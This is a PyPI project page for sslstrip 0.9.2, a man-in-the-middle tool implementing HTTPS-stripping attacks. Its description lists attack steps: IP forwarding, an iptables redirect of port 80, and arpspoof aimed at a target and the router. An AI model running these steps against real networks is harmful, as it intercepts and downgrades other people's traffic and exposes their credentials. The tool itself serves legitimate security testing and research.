This is a pre-production deployment of Warehouse. Changes made here affect the production instance of PyPI (pypi.python.org).
Help us improve Python packaging - Donate today!

A MITM tool that implements Moxie Marlinspike's HTTPS stripping attacks.

Project Description

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks.

It requires Python 2.5 or newer, along with the ‘twisted’ python module.

Installing:
pip install sslstrip
Running:

sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options.

The four steps to getting this working (assuming you’re running Linux) are:

  1. Flip your machine into forwarding mode (as root): echo “1” > /proc/sys/net/ipv4/ip_forward
  2. Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <yourListenPort>
  3. Run sslstrip with the command-line options you’d like (see above).
  4. Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
More Info:
http://www.thoughtcrime.org/software/sslstrip/
Release History

Release History

This version
History Node

0.9.2

Download Files

Download Files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

File Name & Checksum SHA256 Checksum Help Version File Type Upload Date
sslstrip-0.9.2.tar.gz (9.2 kB) Copy SHA256 Checksum SHA256 Source Sep 13, 2013

Supported By

WebFaction WebFaction Technical Writing Elastic Elastic Search Pingdom Pingdom Monitoring Dyn Dyn DNS Sentry Sentry Error Logging CloudAMQP CloudAMQP RabbitMQ Heroku Heroku PaaS Kabu Creative Kabu Creative UX & Design Fastly Fastly CDN DigiCert DigiCert EV Certificate Rackspace Rackspace Cloud Servers DreamHost DreamHost Log Hosting